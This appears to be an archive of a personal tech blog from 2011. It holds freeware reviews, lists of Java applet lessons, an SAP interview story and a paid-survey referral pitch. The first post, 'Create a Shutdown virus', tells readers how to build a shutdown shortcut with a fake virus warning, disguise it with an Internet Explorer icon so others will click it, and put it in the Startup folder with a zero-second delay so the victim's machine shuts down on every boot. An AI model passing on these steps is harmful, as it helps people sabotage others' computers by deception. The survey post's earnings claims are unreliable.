Saturday, December 31, 2011

Create a Shutdown virus: Auto-Executable

Background Information:

You can create desktop shortcuts to shutdown or restart Windows, or go into standby or hibernate mode, with a single click. You can put these shortcuts anyplace you like — on the desktop itself, the Quick Launch bar, your Start Menu — wherever.

To make a new shortcut, right-click on an empty part of the desktop (or inside a folder). Select New, then Shortcut. A “wizard” will pop up to guide you through the rest of the process. You will have to provide a command line in the location, and then a name. The name can be anything you want.


The commands are:


  • To Shutdown : shutdown -s -t 30 -c "Your Message here"
  • To Restart: shutdown -r -t 30 -c "Your Message here"
  • To abort Shutdown: shutdown -a
  Customize the commands:
  • -s : For Shutting down.
  • -r : For Restarting
  • -a : For Aborting
  • -t : The value after this command is the seconds after which the required action will be carried.
  • " ": The string within the quotes is the message that you want to display.


Create a Shutdown virus: Auto-Executable
To create a Shutdown Virus:
  • Right-click on your desktop and selecting New, and then, Shortcut.
  • A Create Shortcut wizard box should then open. In that box, write the following: 
 shutdown -s -t 30 -c "VIRUS DETECTED. System will shutdown in 30 seconds"
 

Note: the number 30 can be replaced by any other number. That number corresponds to the number of seconds before the computer will shutdown. Here I have chosen 30 in order to have enough time to close it before my computer shuts down. Also, the message between quotes can be replaced by something like "YOU HAVE BEEN INFECTED BY A TROJAN VIRUS" or some other great idea. However, the message must be between quotes.

  • After, simply click on Next and a box with the name Shutdown will appear. 
  • Change the name that you want for it. 
In this case I have chosen Internet Explorer but it can always be renamed how you prefer.

  • Click on Finish
Your shutdown virus is created. Now you need to make it unpredictable by others i.e, you have to disguise it:
  • Right-click on your shutdown icon and select Properties.
  • Select Change Icon.




Note: A box saying "system 32 does not have any icons choose from a different list" or something like that may pop-up; if it does simply click on OK

Now it depends on what you have named your shutdown virus. If you chose Internet Explorer scroll all the way to the right and you will find the icon. If you did not choose Internet Explorer feel free to choose a different icon... Remember it has to be something that people will click on.
Apply the icon. Now you are done!

Note: This is very real and the system will shutdown in the time specified. So if you have run the shortcut and then wanted to stop the shutdown then to this:
  • Click on Start > Run.
  • Write: shutdown -a
  • Click OK

Now Making it Auto-Executable:
Copy the shutdown shortcut and paste it to the Startup Folder

For Windows 7/Vista: Click on Start > All Programs > Startup

For XP:
Navigate to this folder C:(system drive)\Documents and Settings\"YOUR USER NAME"\Start Menu\Programs\Startup

Now your shutdown virus is added to the windows startup and whenever the system is started this will execute automatically.

Now if you want to make this more freaky! then u can reduce the time to as minimum as 1 or 0 second. So whenever the the system starts the user will not even get a second to cancel the shutdown. So the system will shutdown instantly whenever it is started!

Watch the
Video Tutorial:

Thursday, December 29, 2011

Speed Up Your Internet Connection with Auslogics Internet Optimizer

Though if you use high-speed broadband connection and still not getting the speed offered your ISP before upgrading your connection to high-speed plan why don’t you try to optimize your Computer Settings to increase internet connection speed where you don’t need to do this  manually freeware Auslogics internet optimizer helps to increase internet connection speed by applying speed for your connection automatically.


Auslogics Internet Optimizer

Internet Optimizer offers two types of optimizations for your connection, Auto Optimization and Manual Optimization.  Auto Optimization is recommended for all users.  Manual Optimization offers settings which you need to manually select and apply.

For Auto Optimization, all you need do to is select your internet connection speed and click Analyze button where Internet Optimizer optimizes various settings like Max MTU and RWIN based on internet connection you use. Why not check your net performance by visiting speedtest.net before optimization so that you can recheck again after using the program to know performance gains.

auto optimization

Once necessary parameters optimization is determined  by the program those parameters are displayed, you can select any one of them to view description or just click Optimize button and restart your Computer once the program prompts.

Restoring default settings of your Connection

Rescue Center in Internet Optimizer automatically backs up default settings so you can restore them by undoing changes made by program whenever you want by selecting Restore Default Settings from Action menu.
Auslogics Internet Optimizer is module of Auslogics Boost Speed program, works on all Windows.

Download Auslogics Internet Optimizer

Sunday, December 25, 2011

Java Programming Class 36 Applet TextFields

This class contains following.
  • How to Create a TextField in Java ?
  • How to Set Number of Charcaters to be visible in TextField ?
  • How to add Created TextField to Applet ?
  • How to use getText() Method ?
  • How to use setText() Method ?
  • How to Make a TextField as Password Field ?
  • How to use setEchoChar() Method ?
  • How to use getEchoChar() Method ?
  • How to use echoCharIsSet() Method ?
  • How to Make a TextField Locked( It is not Editable ) ?
  • How to use setEditable() Method ?
  • How to use isEditable() Method ?
DOWNLOAD(7.99MB)

Java Programming Class 35 Applet Buttons

This class contains following
  • How to create Buttons in Applet ?
  • How to add a Button to Applet ?
  • How to give Text on Button while creating it ?
  • How to use setLabel() Method ?
  • How to use getLabel() Method ?
DOWNLOAD(1.59MB)

Java Programming Class 34 Applet Labels Part 3

In this class we write a program that creates 2 labels and add them to Applet

DOWNLOAD(546.57KB)

Friday, December 23, 2011

Absolute Uninstaller: Uninstall Multiple Programs At Once

Revo Uninstaller is popular uninstaller in removing left over entries of applications after their uninstall where Add/Remove programs lacks, IOBit Uninstaller is same as Revo Uninstaller but allows to batch uninstall programs, Absolute Uninstaller is freeware alternate to Windows  Add/Remove programs allows to completely uninstall programs and lets you batch uninstall selected programs at once.

Absolute Uninstaller

Using Absolute Uninstaller
Download and install the program on your Computer, during the setup do uncheck for setting Glary Search as your homepage. Unlike Add/Remove Program applet this program doesn’t take much time to populate installed programs but also highlights recently installed programs.
Completely uninstalling the program
You can select a program and click Remove button to let the program perform app uninstallation after that you’ve the option to browse for the left over entries remained in app directory you can delete them without even browsing with Delete All button. 

delete all left over entries in directory


Batch uninstall programs
If you want to uninstall multiple programs at once, click on Batch uninstall and select the checkboxes and click on uninstall checked programs where they will be uninstalled one be one.

batch uninstall applications


This program displays uninstaller path of the program in the command line on selection something other uninstaller doesn’t provide. This program allows to search for the program for you to uninstall unless you’ve installed too many programs you can simply scroll down and select your program.
You can sort installed programs by their install date or name. You can autofix invalid entries like if they are already removed but the case with entries existing by selecting autofix invalid entries form the edit menu.
Absolute Uninstaller works on all Windows.

Download Absolute Uninstaller

BufferZone Pro 4.0 Released

BuffereZone Pro freeware security software that protects you from threats by running your applications in virtual buffer zone, in the past Trustware offered this as free and Pro versions now BufferZone Pro made as freeware. BufferZone Pro 4.0 is a major version which released with enhanced removable device protection capabilities and with several performance and stability improvements.


BufferZone Pro 4.0

BufferZone enables you to
  • Surf anywhere & download anything worry free.
  • Open email attachments with no fear.
  • Share and chat with your friends safely.
  • E-bank with peace of mind.
  • Keep private files & folders invisible to malicious attacks.
  • Use external media/storage with no threat of PC infection.
With BufferZone, all programs or files that enter your computer through downloading, browsing or uploading with external media devices are redirected to a Virtual Zone (C:\Virtual). C:\Virtual is a special directory in your computer’s registry that keeps external programs and files in an isolated environment, separated from your trusted personal files and your PC’s operating system.
You can edit programs that run inside the BufferZone and you can also uninstall programs that installed in BufferZone and you can empty it also from the BufferZone program window. Click on arrow button to get extended options.
User can add banking sites to Privacy Zone which protects your privacy by isolating your Internet Explorer browser when you visit them in it. Your important documents/files can in My Documents’ are treated as Confidential and they’re invisible to apps outside of  the BufferZone.
You can create virtual zone snapshot and restore it when ever you want. BufferZone does complements your antivirus which protects you from viruses, Trojans outside buffer zone, so you still need to use Antivirus in your Computer. 
BufferZone Pro 4 works on Windows XP/Vista/7.

Download BufferZone Pro

Thursday, December 22, 2011

Earn money by doing simple surveys

Hai frineds click on this link and register.

http://www.AWSurveys.com?R=sriramkukkadapu

After that click on surveys and write any 2-3 sentences and submit. u will get 2$,3$.. like that after 50$ u can get the cash out.

It is really amazing.. Im doing that survery's and my balance is ncreasing. one of my friend recently got 2500 Rupees(50$).

Its true.. do that ... 


NOTE: Register only through the link i provided

Sunday, December 18, 2011

My SAP Labs Interview Experience..!

About SAP Company :


ABOUT SAP LABS

SAP Labs India is Sap’s second largest Research & Development and Global Services & Support center in the world.

Founded in November 1998, SAP Labs India is one of the four global development hubs (Germany, US and Israel being others) of SAP that contribute to all areas of the SAP product value chain- Research & Breakthrough Innovation, Product Development, Global Services & Support and Customer Solutions & Operations.

SAP Labs India researches, designs, and delivers leading-edge software applications that enhance and extend SAP? Solutions, and is recognized within the SAP global organization as one of the prime contributors of innovation, quality and service.

As a Global Services and Support organization, Labs India boasts of the largest production team outside Germany providing assembly, validation and test services, and is credited as being the largest testing center within SAP.

About SAP India

SAP India is the fastest growing subsidiary of SAP AG, the world's leading provider of business software solutions.

SAP India began its operations in 1996 with headquarters in Bangalore and offices in Mumbai, New Delhi, Kolkata, and a direct presence in nine cities across India, besides having marketing associates in Sri Lanka and Bangladesh.

Over the last 11 years, SAP has been the undisputed market leader in the Indian enterprise software market. In August 2006, the company was the first enterprise software vendor in India to cross the 1000-customer mark and with strong momentum powering the adoption of its solutions in 2007, the number of its Indian customers is now well over 3000.

Declared as the ‘Hub of the year in Asia Pacific and Japan” in 2007, SAP India witnessed an unprecedented growth of over 100% both in terms of license revenue and customer acquisition.

Besides a growing headcount of 4835 employees (Labs, Global Delivery Centers, Field), SAP India has a strong and growing ecosystem of 200+ partners for its different solutions and different verticals across geographies, Global Services Partners and 105363 combined SDN and BPX Members in India. 

My Interview Process :

1) First of all i don't went directly to SAP labs, There is a consultancy called MAGNA Info.Tech in Bangalore.

2) I came to know from my friend Swathi that Magna is conducting a Written Test for S/W Texting Postion in 1 of its MNC clients. 

3) Actually i dont know anything about testing , but i got the information that the Written Test consits of C , Aptitude , SQL so i got intrest to write that written test and went there.When i reached there Already some people are writng exam. After they hav completed my turn came.

4) Then i came to know that client is SAP Labs. I thought this Written test may be fraud , because SAP is Very Good company , He will gtake only people from IIT's , NIT's and Bits Pilani only , then i made a phone call to my Roommate who is working in SAP labs and told about this MAGNA , then he told me it is a good outsourcing company and write the test well .

Mean while when writing exam, i tried to help my friend and we were caught and his place is changed by invizilator. But i helped a girl sitting behind me , she and me also cleared written test. 
Now the Terror round next is Group Discussion , I have good speaking ability but the problem is I may/may not get a chance to speak ! The G.D was conducted very well by the invizilators and every one in da team got a chance to speak. I forgot to say this "Our G.D topic is LoveMarriages Vs Arranged Marriages". I spoke some bullet points and I have cleared G.D.They told us dat on next day morning 10:30 der will be interview.

5) In Interview he asked following Questions .

a) Tell me about your self ?
b) What is Encapsulation ?
c) What is difference between C/C++/Java ?
d) Write logic in C that merges 2 arrays and after merging the result array should be sorted ?
e) He asked a puzzle Prove that a^b=b^a where (a not equal b)  ?

6) I have answered all the questions well . He told me they will inform later , when will be the written test in SAP labs .

7) After 2 days , I got a mail  from magna to attend written test in SAP labs. 

8) I went there and Written Test is the First Round . Test will contain 40 Questions , Cuttoff is 25 ,  No Negative Marking  and time is 40 min.

9) I cleared that written test and on next day Tech round was der. In general i wont prepare for any written test or Tech rounds.. I went der       without any strong preparation, bec daily i will spend my time more on my laptop with C,Java etc.. 

10)  The questions asked in SAP Labs Tech round were quiet easy.

a) Tell me about yourself ?

b) Asked about Login Module in my Project ?

c) Asked to write an SQL query to select Employee name who has maximum age ?

d) Asked to write a Program in C that prints Pyramid with * in C ?

e) Asked Real world Examples where we can see Stack , Queue and Linked  List ?
        
        For this question everyone can answer about stack , queue but i answere Linked - List in a
        funny  and different way , Madam got impressed with my answer , and she kept laughing for few seconds .

   f) What is da difference between Stack memory and Heap memory ?
   
   g) What is the difference between wait() method and delay() method ?
   
   h) In how many ways we can create a Thread in Java ?

   i) In middle of my Interview another person  came with his laptop , he saw blogging as my hobby in my Resume and Open my blog and saw it.

   j) Both persons who interviewed me are very cool and they have made me cool when i get tensed.

k) They asked me you are good in development , so we want to forward your Resume to development team , i said OK.

l) After my interview around One and half hour later i came to know that i have cleared technical round and H.R will be after 2 hours and in           mean while she told me to take lunch.

11) In H.R round madam asked me following questions,

   a) Tell me about yourself ?
   b) Encapsulation , Wrapper Classes ?
   c) In ur graduation , which Textbook u have studied for Software Testing Subject ?
   d) Write a Program in C++ that uses both classes and structures ?
   e) Tell me about your family ?
   f)  You are good in development , then why are you coming for Testing position in our company ?
   g) What are the products of SAP ? 
 
After my H.R interview , they told me i have to face 1 more round called Development round , but after 2-3 days i got call from Magna Infotech and they said I was selected for Software Testing Position in SAP Labs with package of 2.4 Lakh per annum.

I am  very happy to become a SAP employee.

Thanq SAP

System Spec Produces Complete Specification of Your System Software and Hardware


Microsoft covered lot of system information utilities in the past but System Spec is freeware portable tool which produces your system hardware and software specification with in a second without much of scanning. System Specification is generally about hard drive capacity, processor type and mode you’re using motherboard manufacturer name, capacity of RAM installed in your Computer what type of RAM it is like that.


System Spec


Using System Spec
If you’re novice user without much of technical knowledge about Computer parts then you don’t need to worry if some one asks what’s your system specification?  You can easily view, save and print your system specification with this system information utility.


System Specification print



There’s more for power users where you user can know detailed information about memory, display, hard drive and SMART parameters, CD/DVD, CPU, BIOS, Internet, installed programs, Network, Printers, Sound, USB, USB drive and etc.,.
You can also access system commands, settings, programs and power options You can save generated system information to CSV or HTML format or you can print full specification of your system by using  Ctrl +P command.
System Spec works on Windows XP/Vista/7.

Download System Spec

Saturday, December 17, 2011

Enable Facial Recognition in Windows 7 to Set Face as Login Password


Blink by Luxand is a free facial recognition tool for Windows that lets users associate face with username and password. Blink! can recognize users face from computer or laptop webcam quickly and match it with images in database. This tool is both accurate and reliable as it comes from Luxard labs who is quite famous for developing face recognition services. As far as security is concerned an anonymous or third-party user can’t fool around and gain access as Blink! effectively eliminates false positives.
Once after downloading and installing Blink! on Windows Vista or Windows 7 you can enable facial recognition to scan your face. The saved face image will be associated with your user account name and password. Now when you logout, restart or lock your Windows screen, Blink! will be active and ready to capture the users face via webcam. Successful face match will let user gain access to their account. Blink! is available for Windows 7 and Vista (32-bit and 64-bit).
This tool can be used as a free alternative to the commercially available “Fast Access” face recognition software that comes installed on many Dell laptops. Unlike Blink!, Fast Access being a premium product is feature rich.
Luxand Blink Settings

Customize Windows 7 Logon Screen with Windows 7 Logon Assistant


There are many free apps available on internet lets you change Windows 7 logon screen with custom background image, we’ve even covered Logon Editor app in the past which lets you edit Windows 7 Logon screen, Windows 7 Logon Assistant is freeware portable app lets you tweak logon screen and you can enable the option and login to windows with a smart card if you’ve one available.


Windows 7 Logon Assistant


Using Windows 7 Logon Assistant


  • After running the app you’ll be presented with app UI with Logon Tweaks, Logon Button Set and Logon Message sections. From the logon tweaks, you can enable and display last logon information on logon, make user to enter username at logon, Remove shutdown button from logon and enable version logging (requires system restart) .
  • If you’ve smart card you can enable  the option for it and logon with it. You can hide the brand name on logon. You can set logon button to have darker text shadows and lighter buttons or to have no text shadows and opaque button where windows default is set as lighter text shadows and lighter button.
  • You can display desired welcome message at logon by typing in the message caption and message body boxes, leave those fields if no need to display message in logon. We’re getting exception on our end on selecting and applying settings, let us know what’s happening on your side.

DOWNLOAD(59KB) 

Replace Windows Default Notepad with Notepad++ or Other Alternatives with Notepad Replacer


There are many free Notepad alternatives for Windows default text editor available on internet  like Notepad++ , Notepad2,etc. offers better features like syntax highlighting, spell checking, tabbed interface  etc.., I myself found bit difficult make Notepad++ as the default text editor on Windows though there are batch files and tips you can find on Google to make this possible, but Notepad Replacer is a freeware app  that replaces Windows notepad with notepad replacement apps like Notepad ++ easily.


Notepad Replacer


Using Notepad Replacer

During the setup, you need to specify the path of text editor executable you want to replace with Windows notepad, it isn’t a difficult task .  Once you done that, click on Install button and after the installation is finished, it’s magic! Notepad alternative you selected has been set as default text editor. You can confirm this using notepad command from Run command box.

Advantages of using Notepad Replacer
  • Won’t replace ANY system files, or change ANY file permissions
  • Won’t trigger Windows File Protection warnings (WFP)
  • Won’t run all the time, won’t take up any system resources in the background
  • Doesn’t require special support by the alternative application
To make Windows notepad default text editor again, you just need to uninstall the Notepad Replacer program from your Computer.Notepad Replacer works on Windows XP/Vista/7.

DOWNLOAD(597.17KB)

JJava2CoreLanguageLittleBlackBook

Friday, December 16, 2011

UnCleaner Software.....!


  • This software cleans unnecessary files in ur system.
  • It occupies less space on disk.
  • It is efficient to use.
  • I am using this software , it is very nice . 
 DOWNLOAD(900KB)

Thursday, December 15, 2011

Java Programming Class 33 Applet Labels Part 2

This class shows u how to use setText() method ?

DOWNLOAD(560KB) 

Java Programming Class 32 Applet Labels Part 1

This class contains following.

  • How to create a Java Label ?
  • How to set Alignment for it ?
  • How to add Created label to Applet ?
  • Java Program that displays 2 labels on an Applet ?

DOWNLOAD(1.09MB) 

Java Programming Class 31 Applet Parameters

This class contains following.

  • How to use <Param>  tag in Applets ?
  • What are the attributes name,value in <param> tag ?
  • How to use getParameter() method ?
  • Java Program that reads the name of Font and Font size from <param> tag n display's a text with that font  and  size. ?
DOWNLOAD(4.43MB)

Sunday, December 11, 2011

Java Programming Class 30 Applet Fonts

This class shows u how to set Font for Text inside the Applet window using Font class.

DOWNLOAD(8.60MB)

Java Programming Class 29 Applet Window Color

This class contains following.
  • How to Change Color of Applet Window ?
  • How to Create our own Color ?
  • How to Change Color of Applet Window to above created color ?
DOWNLOAD(8.89MB)

Java Programming Class 28 Applet Figures

This class contains following.
  • How to draw a line in Applet window ?
  • How to set color for that line ?
  • How to draw a rectangle ?
  • How to fill a Rectangle with a color ?
  • How to draw a oval/circle ?
  • How to fill oval with a color ?
  • How to draw a Rounded-Rectangle ?
  • How to fill Rounded-Rectangle with a color ?
  • How to draw an Arc ?
  • How to fill an Arc ? 
DOWNLOAD(25.59MB)

Java Programming Class 27 Applet Execution Method 2

This class contains following.
  • How to Create an Applet ?
  • How to Execute an Applet without "AppletViewer" ?
  • How to create a HTML file ?
  • How to write applet code in it ?
  • There after , How to Execute Applet in "Browser(IE)" ?
DOWNLOAD(11.49MB)

Java Programming Class 26 Applet Excecution Method 1

This class shows u How to create an Applet in Java ? and How to Execute It ? 

DOWNLOAD(4.15MB)

Java Programming Class 25 Sleep Method

This class shows u how to use sleep() method in Threads ?

DOWNLOAD(38.18MB)

Java Programming Class 24 Thread Priority

This class shows u how to set priority to Threads ?

DOWNLOAD(3.47MB)

Java Programming Class 23 Threads

This class contains following.
  • How many ways are there to create a thread ?
  • How to Execute a Thread ?
  • Programs that Explains above 2 concepts ?
DOWNLOAD(16.46MB)

Java Programming Class 22 finally keyword

This class explains the purpose of finally keyword in java.

DOWNLOAD(8.02MB)

Java Programming Class 21 final keyword

This class contains following.
  • How to use final keyword with Variables ?
  • How to use final keyword with Methods ?
  • How to use final keyword with Classes ?
DOWNLOAD(10.87MB) 

Java Programming Class 20 Constructors In Inheritance

This class contains following.
  • Constructors in  Multi-Level Inheritance ?
  • How to pass parameters for Super Class ?
  • Java Program that demonstrates the execution of constructors in Multi-Level Inheritance ?
  • Java Program that demonstrates Passing Parameters to Super Class ?
DOWNLOAD(6.47MB)

Java Programming Class 19 Userdefined Exceptions

This class contains following.
  • What is a "User-defined Exception" ?
  • Example For "User-Defined Exception " ?
  • Java Program that demonstrates User-Defined Exception ?
DOWNLOAD(9.56MB)

Friday, December 9, 2011

Java Programming Class 18 Exceptions

This class contains following.
  • what is an Exception?
  • How to Handle an Exception ?
  • Arithmetic Exception , Array Index Out Of Bounds Exception , Number Format Exception ?
  • Java Program that demonstrates all the above Concepts ?

DOWNLOAD(17.66MB)

Java Programming Class 17 Multiple Inheritance

This class contains following.
  • What is Multiple Inheritance ?
  • Did Java Support it ?
  • If Supports , on What Condition ?
  • Java Program that demonstrates Multiple Inheritance ?

DOWNLOAD(14.14MB)

Java Programming Class 16 Interfaces

This class contains following.
  • What is an Interface ?
  • What is the difference between Interface and Abstract Class ?
  • "implements" Keyword ?
  • Variables in interface are static and final . How ?
  • Java program that demonstrates Interfaces ?

DOWNLOAD(20.14MB)

Java Programming Class 15 Abstract Classes/Methods

This class contains following.

  • What is an Abstract Class ?
  • Difference between Method Declaration and Method Definition ?
  • Java Program that demonstrates Abstract Classes and Abstract Methods ?

DOWNLOAD(12.61MB)

Java Programming Class 14 Super Keyword

This class contains following.
  • What is Super keyword ?
  • Where it is used ?
  • Java Program that demonstrates use of super keyword ?

DOWNLOAD(7.80MB)

Thursday, December 8, 2011

Java Programming Class 13 Methods inside Main class

This class contains following.
  • How to write methods inside class with main() method ?
  • How to use static method inside main class ?

DOWNLOAD(5.77MB)

Java Programming Class 12 Inheritance

This class contains following.
  • What is Inheritance ?
  • What is a derived/child/sub class ?
  • What is base/parent/super class ?
  • Inheritance Types ?
  • Java Program for Single Inheritance ?
  • Java Program for Multi-Level Inheritance ?
  • Java Program for Hierarchical Inheritance ?
  • Java Program for Hybrid Inheritance ?

DOWNLOAD(34.00MB)

Java Programming Class 11 Static Variable

This class contains following.
  • What is a Static Variable ?
  • How to declare and use a static variable in java ?
  • How to write a Java Program that gives number of objects created for a class ?
  
DOWNLOAD(1.88MB)

Wednesday, December 7, 2011

Java Programming Class 10 Constructors

This class contains following.
  • How to use default constructor in java?
  • How to use parameterised constructor  ( Constructor Overloading ) in java?
  • How to use Constructor as Object Initializer ( Copy Constructor ) in java ?
DOWNLOAD(2.62MB)

Java Programming Class 09 Sorting give set of Strings

This class shows u how to write a java program that sorts given set of strings ?

Java Programming Class 08 String Pallindrome or not ?

This class shows how to write a Java program to find whether a given string is pallindrome or not ?

DOWNLOAD(1.51MB)

Java Programming Class 07 String Reverse Program

This class contains 
  • How to reverse a string ? - Method 1
  • How to reverse a string ? - Using Pre-defined method reverse() ?

DOWNLOAD(1.31MB)

Java Programming Class 06 String Methods

This class contains following.
  • How to declare a string in java?
  • How to find length of a string?
  • How to compare 2 strings?
  • equals() method ?
  • equalsIgnoreCase() method ?
  • toUpperCase() method ?
  • toLowerCase() method ?
  • compareTo() method ?
  • replace() method ?
  • trim() method ?

DOWNLOAD(26.78MB)

Java Programming Class 05 Reading Input From User

This class contains following.

  • Reading Input using InputStreamReader and BufferedReader
  • Reading Input using DataInputStream.
  • Reading Input using Scanner in util.* package.
  • Java Program for Addition of 2 numbers ( taking those 2 numbers from user) using above 3 methods.


DOWNLOAD(32.81MB)

Java Programming Class 04 Class and Object

This class contains following.
  • How to Create a Class in Java?
  • How to define methods inside a class?
  • How to create object ?
  • How to access class members using object?

DOWNLOAD(17.13MB)

Tuesday, December 6, 2011

Java Programming Class 03 Parsing Methods

This class contains following.
  • How to Convert Strings to Integers?
  • How to Convert Strings to Floats?
  • How to Convert Strings to Doubles?
  • Java Program that Performs Addition of Given Integers in Command Line?
  • Java Program that Performs Addition of Given Floats in Command Line?
  • Java Program that Performs Addition of Given Doubles in Command Line?

DOWNLOAD(12.59MB)

Java Programming Class 02 Datatypes

This class contains following.
  • How to use integer data type ? 
  • How to use float data type ?
  • How to use double data type?
  • How to use char data type?
  • Java Program for "Addition of 2 Integers" ?
  • Java Program for "Addition of 2 Floats" ?
  • Java Program for "Addition of 2 Doubles" ?
  • Java Program for "Addition of 2 Characters" ?

DOWNLOAD(11.95MB)

Java Programming Class 01 Introduction

This class contains following.
  • How to Set Path in Java?
  • How to check whether path is set Correctly or not?
  • What is Problem with C Language?
  • What is Problem with C++?
  • What are the features of Java?
  • What are OOPS Principles?
  • Java Program for "Hello World"?
  • Java Program with "Command Line Arguments"?
  • How to find How many Command Line Arguments are given?

DOWNLOAD(65.23MB)

How to avoid our mails going to spam - FIx the issue in 3 simple steps

If you see our emails from (info@jobcurator.in) are going to spam, fix it using below steps. Note: Try this in desktop/laptop 1) Go to any...